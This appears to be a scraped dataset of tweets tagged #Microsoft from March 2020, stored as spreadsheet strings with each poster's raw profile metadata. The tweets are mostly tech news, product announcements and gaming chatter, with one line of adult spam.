    <t>{'id': 1042580300017000448, 'id_str': '1042580300017000448', 'name': 'UnitingDigital', 'screen_name': 'UnitingDigital', 'location': 'Los angele', 'description': 'A central hub where all digital talented people can share and learn. Come and Join Us.ðŸ˜ƒ Opportunities to write for us.âœï¸ #software #electronics #Cybersecurity', 'url': 'https://t.co/VXT5rAlRl5', 'entities': {'url': {'urls': [{'url': 'https://t.co/VXT5rAlRl5', 'expanded_url': 'https://www.unitingdigital.com/', 'display_url': 'unitingdigital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 428, 'friends_count': 1772, 'listed_count': 9, 'created_at': 'Thu Sep 20 01:04:48 +0000 2018', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 49, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1042593575463055360/jShdWCse_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042593575463055360/jShdWCse_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1042580300017000448/1537409126',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</si>
  <si>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22:46:45 +0000 2020</t>
  </si>
  <si>
    <t>Find out more about this hidden gem in #Microsoft Excel. https://t.co/Iq4tQJEhpC https://t.co/Iq4tQJEhpC #business</t>
  </si>
  <si>
    <t>{'id': 35705549, 'id_str': '35705549', 'name': 'Amaxra', 'screen_name': 'Amaxra', 'location': 'Redmond, WA', 'description': '#Redmond based #WBENC #NWBOC #MSPartner certified business consulting company using #Microsoft-based solutions. We do #SharePoint #Office365 #Dynamics and more.', 'url': 'http://t.co/mT448Pqn3B', 'entities': {'url': {'urls': [{'url': 'http://t.co/mT448Pqn3B', 'expanded_url': 'http://www.amaxra.com', 'display_url': 'amaxra.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1032, 'friends_count': 1742, 'listed_count': 82, 'created_at': 'Mon Apr 27 09:13:11 +0000 2009', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9561, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3CA4C7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/661598960167993344/MXIv7e0l_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/661598960167993344/MXIv7e0l_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35705549/1560751270', 'profile_link_color': '715EB8', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '4D3D8D', 'profile_text_color': 'D2B8E6', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 22:45:46 +0000 2020</t>
  </si>
  <si>
    <t>We are buying all day long until 7pm tonight #TheWitcherNetflix #netflix #xbox #xbox360 #xboxone #microsoft #nintendo #wii #goldeneye #toronto https://t.co/u1JnPPfn80</t>
  </si>
  <si>
    <t>{'id': 34424279, 'id_str': '34424279', 'name': 'TheRealRetroStoreONT', 'screen_name': 'toyrattca', 'location': '781MainstMiltonRetailStore#19', 'description': 'official twitter account\nwe  are where retro lives est in 2002. \nYou can find us anywhere and everywhere in the GTA\nInstagram toyratt\nOpen 7 days a week', 'url': 'https://t.co/RZuvdX13hg', 'entities': {'url': {'urls': [{'url': 'https://t.co/RZuvdX13hg', 'expanded_url': 'http://www.toyratt.ca', 'display_url': 'toyratt.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1752, 'friends_count': 246, 'listed_count': 140, 'created_at': 'Wed Apr 22 22:30:40 +0000 2009', 'favourites_count': 1328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25078,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'http://pbs.twimg.com/profile_images/1225140345240989696/ka6M-W_I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225140345240989696/ka6M-W_I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34424279/1582378019', 'profile_link_color': '009999',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</si>
  <si>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22:44:34 +0000 2020</t>
  </si>
  <si>
    <t>Tara Raj is the Program Manager of Windows Subsystem for Linux at Microsoft. We spoke to her about WSL and the possibilities of combining Linux and Windows! #Microsoft #HyperV https://t.co/o8JT6Q5dOj</t>
  </si>
  <si>
    <t>Thu Mar 05 22:39:52 +0000 2020</t>
  </si>
  <si>
    <t>I love when they fuck me for a long time, all night #Quitman County   #microsoft #pets https://t.co/oss6lVdxjH</t>
  </si>
  <si>
    <t>{'id': 1235526630770192384, 'id_str': '1235526630770192384', 'name': 'Amanda Hernandez', 'screen_name': 'racsanisdeo', 'location': 'Albuquerque, USA', 'description': 'Immature love says: â€˜I love you because I need you.â€™ Mature love says â€˜I need you because I love you.â€™  â€“ Erich Fromm', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Thu Mar 05 11:24:46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'http://pbs.twimg.com/profile_images/1235531958559690752/UQo97PcS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235531958559690752/UQo97PcS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235526630770192384/1583408871',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</si>
  <si>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22:34:41 +0000 2020</t>
  </si>
  <si>
    <t>Get a sneak peek at upcoming Data &amp;amp; AI Microsoft Exams and Certifications (DA-100 and DP-300). https://t.co/aElqXLjzAq #Microsoft #Azure https://t.co/SqQp1ELSyE</t>
  </si>
  <si>
    <t>{'id': 15003924, 'id_str': '15003924', 'name': 'Taygan Rifat', 'screen_name': 'tayganr', 'location': 'London, England', 'description': 'Partner Technology Strategist @Microsoft', 'url': 'https://t.co/UuIFSRzQDK', 'entities': {'url': {'urls': [{'url': 'https://t.co/UuIFSRzQDK', 'expanded_url': 'https://www.taygan.co', 'display_url': 'taygan.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 51, 'listed_count': 12, 'created_at': 'Wed Jun 04 11:41:26 +0000 2008', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/534286453799280641/AGY90yhC_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/534286453799280641/AGY90yhC_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15003924/1430687992',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</si>
  <si>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22:34:23 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Windows 10 Insider Preview Build 19577: https://t.co/dV6a1ybdll #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 22:34:19 +0000 2020</t>
  </si>
  <si>
    <t>Our vote for the top change infographic of the month form @theverge and their #Tech2020survey 
The ranking of Tech company favourability:
#amazon
#google
#youtube
#netflix
#microsoft
#sonos (surprise) 
#apple
#slack
#instagram
#facebook
#twitter 
https://t.co/KKlDYGkYIV https://t.co/EG2lpoAtxI</t>
  </si>
  <si>
    <t>{'id': 1126826429629517824, 'id_str': '1126826429629517824', 'name': 'FutureproofingNext', 'screen_name': 'FutureproofingN', 'location': '', 'description': '"Innovation you can take to the bank" - the next generation and community for corporate innovation, business models, foresights, transformation and growth', 'url': 'https://t.co/sQ9jwlqy26', 'entities': {'url': {'urls': [{'url': 'https://t.co/sQ9jwlqy26', 'expanded_url': 'http://www.FutureproofingNext.com', 'display_url': 'FutureproofingNext.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 742, 'listed_count': 1, 'created_at': 'Fri May 10 12:28:51 +0000 2019', 'favourites_count': 243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 445,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'http://pbs.twimg.com/profile_images/1126826669501747200/H4xCcBCE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126826669501747200/H4xCcBCE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126826429629517824/1557716910',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</si>
  <si>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22:31:42 +0000 2020</t>
  </si>
  <si>
    <t>News from #PowerShell
#PowerShell #Sysadmin #Microsoft
 Visual Studio Code for PowerShell 7 https://t.co/MIrpkcwd1u</t>
  </si>
  <si>
    <t>{'id': 37819187, 'id_str': '37819187', 'name': 'TravisRoberts', 'screen_name': 'Ciraltos', 'location': 'ÃœT: 45.067745,-93.302879', 'description': 'Cloud, Technology and Trends\nTweets/comments/posts are my own', 'url': 'https://t.co/jlIig49fxz', 'entities': {'url': {'urls': [{'url': 'https://t.co/jlIig49fxz', 'expanded_url': 'http://www.ciraltos.com', 'display_url': 'ciraltos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 347, 'friends_count': 277, 'listed_count': 24, 'created_at': 'Tue May 05 01:21:29 +0000 2009', 'favourites_count': 1661, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3343,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'http://pbs.twimg.com/profile_images/917756179882766336/_brQU8Xh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/917756179882766336/_brQU8Xh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37819187/1538100109',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</si>
  <si>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22:30:16 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Standalone Remote Desktop Gateway on the Microsoft Windows Server 2019 #RDP #Remote Desktop Services Gateway #Gateway #Microsoft #Server 2019 https://t.co/cDrvInZ38k</t>
  </si>
  <si>
    <t>{'id': 2183346330, 'id_str': '2183346330', 'name': 'Cary Sun MVP ðŸ‡¨ðŸ‡¦', 'screen_name': 'SifuSun', 'location': 'Surrey, British Columbia', 'description': 'CISCO CCIE#4531 | Cisco Champion 2018-2019 | Microsoft Cloud and Datacenter Management MVP | Citrix CCP', 'url': 'https://t.co/Uk2JCULjW7', 'entities': {'url': {'urls': [{'url': 'https://t.co/Uk2JCULjW7', 'expanded_url': 'http://carysun.com', 'display_url': 'carysun.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 467, 'friends_count': 415, 'listed_count': 10, 'created_at': 'Sat Nov 09 01:31:44 +0000 2013', 'favourites_count': 942, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1185,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'http://pbs.twimg.com/profile_images/1114728298762792960/dHCaPpOn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114728298762792960/dHCaPpOn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2183346330/1554611206',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</si>
  <si>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22:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OneNote Used To Sidestep Phishing Detection https://t.co/5mIXsgl6XC #microsoft #OneNote #phishing #cyberthreat #cybersecurity https://t.co/DhlgAkZ099</t>
  </si>
  <si>
    <t>{'id': 291831562, 'id_str': '291831562', 'name': 'Paula Piccard ðŸ‡µðŸ‡· ðŸ‡ºðŸ‡¸', 'screen_name': 'Paula_Piccard', 'location': 'New York, USA', 'description': '#NewYork-er #WomeninTech #Cybersecurity Advocate â˜† #DigitalTransformation â˜† Social Media #Marketing â˜† #DigitalMarketing â˜†', 'url': 'https://t.co/LxiX2dqJGR', 'entities': {'url': {'urls': [{'url': 'https://t.co/LxiX2dqJGR', 'expanded_url': 'https://campsite.bio/paulapiccard', 'display_url': 'campsite.bio/paulapiccard', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50900, 'friends_count': 9988, 'listed_count': 1378, 'created_at': 'Mon May 02 17:47:28 +0000 2011', 'favourites_count': 93022, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 95608, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ADB0DE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/291831562/1582050465', 'profile_link_color': '1D43DE',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</si>
  <si>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22:29:53 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Standalone Remote Desktop Gateway on the Microsoft Windows Server 2019 #RDP #Remote Desktop Services Gateway #Gateway #Microsoft #Server 2019 https://t.co/bPa0LG2dLh</t>
  </si>
  <si>
    <t>{'id': 948092003627057153, 'id_str': '948092003627057153', 'name': 'Angus Sun', 'screen_name': 'FrostedFright', 'location': 'Surrey, British Columbia', 'description': '', 'url': 'https://t.co/KWtRKoPiEJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/KWtRKoPiEJ', 'expanded_url': 'http://www.gooddealmart.com', 'display_url': 'gooddealmart.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 85, 'friends_count': 343, 'listed_count': 1, 'created_at': 'Tue Jan 02 07:22:03 +0000 2018', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 181,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'http://pbs.twimg.com/profile_images/983859100139180035/RVjpbItq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983859100139180035/RVjpbItq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948092003627057153/1554609534',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</si>
  <si>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22:29:37 +0000 2020</t>
  </si>
  <si>
    <t>I'm going to retain a lot of Microsoft's stock.... #Microsoft #Retain  #ThursdayThoughts https://t.co/AxYuudrdoV https://t.co/TQOr41fV9x</t>
  </si>
  <si>
    <t>{'id': 783583155450155012, 'id_str': '783583155450155012', 'name': 'Quotes Db', 'screen_name': 'QuotesOnline4Me', 'location': '', 'description': 'Internet Quotes Database: Famous quotes, daily quotes, love quotes, life quotes, inspirational quotes and quotes for any occasion.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 1, 'listed_count': 37, 'created_at': 'Wed Oct 05 08:22:37 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 90559, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/799957420638425093/bYE2QVmz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/799957420638425093/bYE2QVmz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/783583155450155012/1479559654',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</si>
  <si>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22:28:36 +0000 2020</t>
  </si>
  <si>
    <t>Instead of building a PC, gamers will have incentive to buy Series X, &amp;amp; still consider buying #PS5 for exclusives.
By allowing #Steam, #Microsoft would make PC games more accessible, their target market being casual PC gamers who also play console.</t>
  </si>
  <si>
    <t>{'id': 962861531842031616, 'id_str': '962861531842031616', 'name': 'steubeman', 'screen_name': 'steubeman', 'location': 'California, USA', 'description': "Currently uploading #MonsterHunter let's plays to my YouTube Channel. Are you new to #MHGU? Check them out! #NintendoSwitch", 'url': 'https://t.co/6qyWRnXQ7S', 'entities': {'url': {'urls': [{'url': 'https://t.co/6qyWRnXQ7S', 'expanded_url': 'https://www.youtube.com/steubeman', 'display_url': 'youtube.com/steubeman', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 94, 'listed_count': 1, 'created_at': 'Mon Feb 12 01:30:53 +0000 2018', 'favourites_count': 1470, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 691,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'http://pbs.twimg.com/profile_images/989639584605597696/tG7JlabP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989639584605597696/tG7JlabP_normal.jpg',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</si>
  <si>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22:26:31 +0000 2020</t>
  </si>
  <si>
    <t>APEX LEGENDS... Season 4!!! 
https://t.co/5xtLTP32PJ
#xbox #xboxonex #microsoft #apexlegends #battleroyale #season4 #gaming #twitchtv #live #stream #gg</t>
  </si>
  <si>
    <t>{'id': 1191732834614026246, 'id_str': '1191732834614026246', 'name': 'DJ Zemi', 'screen_name': 'zemithedj', 'location': '', 'description': 'DJ/Music Producer/Wannabe Streamer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 63, 'listed_count': 0, 'created_at': 'Tue Nov 05 15:03:51 +0000 2019',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'http://pbs.twimg.com/profile_images/1193962086050750466/1kDdU7wM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193962086050750466/1kDdU7wM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1191732834614026246/1572967066',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</si>
  <si>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22:25:18 +0000 2020</t>
  </si>
  <si>
    <t>Helping #NFL to achieve more by expanding current #technology partnership in one of the worlds most popular professional sports leagues! #Microsoft #Teams #Productivity #Collaboration #Tech https://t.co/IgsYQqXZMJ</t>
  </si>
  <si>
    <t>{'id': 32394460, 'id_str': '32394460', 'name': 'Richard Chaves', 'screen_name': 'richardchaves', 'location': 'Redmond, WA, USA', 'description': 'Sempre explorando como Tecnologia pode melhorar a vida das pessoas e os negÃ³cios das OrganizaÃ§Ãµes. Global Cloud &amp; Digital Transformation for Mid-size companies', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 461, 'friends_count': 168, 'listed_count': 75, 'created_at': 'Fri Apr 17 13:01:20 +0000 2009', 'favourites_count': 636, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3459,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'http://pbs.twimg.com/profile_images/769450746/twitterProfilePhoto_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/769450746/twitterProfilePhoto_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32394460/1440458812',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'regular'}</t>
  </si>
  <si>
    <t>Thu Mar 05 22:22:24 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Windows 10 Insider Preview Build 19577 https://t.co/36KydHa2aa #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 22:22:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft rolls out stable #Edge browser across its 151K employees
https://t.co/CL3bMBxnxV #MicrosoftEdge #browser #developer #IT https://t.co/LgSMQDgdHZ</t>
  </si>
  <si>
    <t>{'id': 2774110179, 'id_str': '2774110179', 'name': 'Dave W Shanahan', 'screen_name': 'DaveWShanahan', 'location': 'Boston, MA', 'description': 'Writer at @OnMSFT, #Microsoft #Xbox #Windows10 #Apps #Games #Surface #Horror movie fan. Fluent in English and Sarcasm. Xbox gamertag: DavidVanDamage', 'url': 'https://t.co/pYM3lTfH9J', 'entities': {'url': {'urls': [{'url': 'https://t.co/pYM3lTfH9J', 'expanded_url': 'https://www.onmsft.com/author/dave_shanahan', 'display_url': 'onmsft.com/author/dave_shâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3855, 'friends_count': 2784, 'listed_count': 125, 'created_at': 'Thu Sep 18 02:34:52 +0000 2014', 'favourites_count': 7874, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19059,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'http://pbs.twimg.com/profile_images/1125514059267411970/xGsaaOS2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125514059267411970/xGsaaOS2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2774110179/1470527871',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</si>
  <si>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22:20:23 +0000 2020</t>
  </si>
  <si>
    <t>It just struck me that #Microsoft might actually allow #Steam to run on #XboxOneX and merge #PCMasterRace &amp;amp; #console gamers.
SeriesX will be more powerful than comparable spec'd PCs at its price, and might actually carve out a new market, sidestepping "Sony v. Microsoft"</t>
  </si>
  <si>
    <t>Thu Mar 05 22:17:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Teams Gains #Outlook Sharing, #Chat Improvements - https://t.co/vgXrlUnkkX</t>
  </si>
  <si>
    <t>{'id': 19797985, 'id_str': '19797985', 'name': 'Dennis Bottjer', 'screen_name': 'dbottjer', 'location': 'Tulsa, OK', 'description': 'SharePoint, O365 Obsessed, Solution Architect, Father, and Coffee Addict', 'url': 'http://t.co/YyZXLcMIub', 'entities': {'url': {'urls': [{'url': 'http://t.co/YyZXLcMIub', 'expanded_url': 'http://about.me/dennis.bottjer', 'display_url': 'about.me/dennis.bottjer', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1342, 'friends_count': 1407, 'listed_count': 194, 'created_at': 'Sat Jan 31 00:46:18 +0000 2009', 'favourites_count': 2475, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19708, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '191338', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/458806653131829248/aIbs_7N8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/458806653131829248/aIbs_7N8_normal.jpeg',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</si>
  <si>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22:16:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft looks to give #Yammer a new lease of life; can it? https://t.co/JQt1vPAfvg</t>
  </si>
  <si>
    <t>Thu Mar 05 22:14:28 +0000 2020</t>
  </si>
  <si>
    <t>[Watch on-demand] Meet the New Yammer Webinar, March 2020 #Microsoft  https://t.co/PzKfXvlZ96</t>
  </si>
  <si>
    <t>{'id': 2873231554, 'id_str': '2873231554', 'name': 'MCarolina Trigo', 'screen_name': 'mcarolinatrigo', 'location': 'Porto, Portugal', 'description': '#ProjectManager | #SharePoint, .NET and CRM @DevScope | #Microsoft | #ProductOwner | Travel &amp; Food Lover', 'url': 'https://t.co/zROKmKBnKB', 'entities': {'url': {'urls': [{'url': 'https://t.co/zROKmKBnKB', 'expanded_url': 'http://www.linkedin.com/in/mcarolinatrigo', 'display_url': 'linkedin.com/in/mcarolinatrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 626, 'friends_count': 2092, 'listed_count': 346, 'created_at': 'Wed Nov 12 01:56:05 +0000 2014', 'favourites_count': 187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4758,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'http://pbs.twimg.com/profile_images/1046747123113480193/UnoLLFrh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046747123113480193/UnoLLFrh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2873231554/1579429524',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</si>
  <si>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Our commitment to customers during COVID-19 #Microsoft  https://t.co/OXfPpTzF04</t>
  </si>
  <si>
    <t>Thu Mar 05 22:14:01 +0000 2020</t>
  </si>
  <si>
    <t>via #TechRadar #New #Windows10 #problem could make your #PC #slower to #boot  so apply this #fix now
#CalculatedComputers #TechNews #WindowsUpdate #Microsoft #Tech #Technology #Switch2Linux #SwitchToLinux #Linux #Ubuntu #ZorinOS #LinuxMint https://t.co/l3qRFublqB</t>
  </si>
  <si>
    <t>{'id': 1118968009572409345, 'id_str': '1118968009572409345', 'name': 'Calculated Computers', 'screen_name': 'Calculated_Comp', 'location': '', 'description': 'Technology focused on Home Theater and Gaming. Also sharing technology news of the world.', 'url': 'https://t.co/SltmjvzfjH', 'entities': {'url': {'urls': [{'url': 'https://t.co/SltmjvzfjH', 'expanded_url': 'http://www.calculatedcomputers.com', 'display_url': 'calculatedcomputers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Thu Apr 18 20:02:17 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 147, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1118968124349591552/ajRgXMS6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118968124349591552/ajRgXMS6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1118968009572409345/1583344307',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</si>
  <si>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22:11:51 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen #Microsoft #Surface Duo could be launching earlier than expected https://t.co/zFo81ymhx3</t>
  </si>
  <si>
    <t>Thu Mar 05 22:10:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Cortana Ends Music and Smart Home Support as Enterprise Shift Continues - https://t.co/BRcBIqsyKY https://t.co/UFqmJcGxak</t>
  </si>
  <si>
    <t>Thu Mar 05 22:07:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Teams just added new #Outlook integration, chat updates and more - https://t.co/Pucq6nHg2a</t>
  </si>
  <si>
    <t>Thu Mar 05 22:06:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Power Automate #RPA features slated for April https://t.co/A9PCwFIKtq</t>
  </si>
  <si>
    <t>Thu Mar 05 22:05:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows10 Start menu that de-emphasizes Live Tiles https://t.co/9TC11wWCSd via @Verge</t>
  </si>
  <si>
    <t>Thu Mar 05 22:04:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces gen'l. availability of PowerShell 7, a cross-platform (Windows, Linux, macOS) automation tool &amp;amp; configuration framework optimized for structured data, REST APIs &amp;amp; object models https://t.co/guV5mBPAoW #Microsoft #PowerShell7 https://t.co/czJLrrPI3s</t>
  </si>
  <si>
    <t>{'id': 2528200772, 'id_str': '2528200772', 'name': 'Tech Provider Zone', 'screen_name': 'TechProZone', 'location': 'The Channel Company', 'description': 'Tech Provider Zone is an online community for #channel partners serving small and medium businesses. Published by @TheChannelCo &amp; sponsored by Intel.', 'url': 'https://t.co/5vpNb9Y7Ps', 'entities': {'url': {'urls': [{'url': 'https://t.co/5vpNb9Y7Ps', 'expanded_url': 'http://www.techproviderzone.com', 'display_url': 'techproviderzone.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 438, 'friends_count': 1329, 'listed_count': 110, 'created_at': 'Tue May 27 20:21:16 +0000 2014', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9973,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'http://pbs.twimg.com/profile_images/1088086710095937537/oiN_Y8nu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088086710095937537/oiN_Y8nu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2528200772/1548255040', 'profile_link_color': '2F4F4F',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</si>
  <si>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22:02:29 +0000 2020</t>
  </si>
  <si>
    <t>@DerekStolpa #Microsoft products' are not very good enough in the VOIP space. #MicrosoftTeams has similar issues.</t>
  </si>
  <si>
    <t>{'id': 34886370, 'id_str': '34886370', 'name': 'Sameer Mathur', 'screen_name': 'ISamMathur', 'location': 'Greenville, DE', 'description': 'à¤¸à¤®à¥€à¤° à¤®à¤¾à¤¥à¥à¤°', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 281, 'friends_count': 106, 'listed_count': 1, 'created_at': 'Fri Apr 24 09:13:44 +0000 2009', 'favourites_count': 638, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2151,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'http://pbs.twimg.com/profile_images/906891115227435017/XXBLETWS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/906891115227435017/XXBLETWS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34886370/1466105097',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</si>
  <si>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Thu Mar 05 22:02:10 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #Azure #cloud      Did you know migrating to Microsoft Azure can reduce your data center footprint 73%? Check out this infographic for an overview and contact Archon Security to learn more! https://t.co/b1tVVwlMmR</t>
  </si>
  <si>
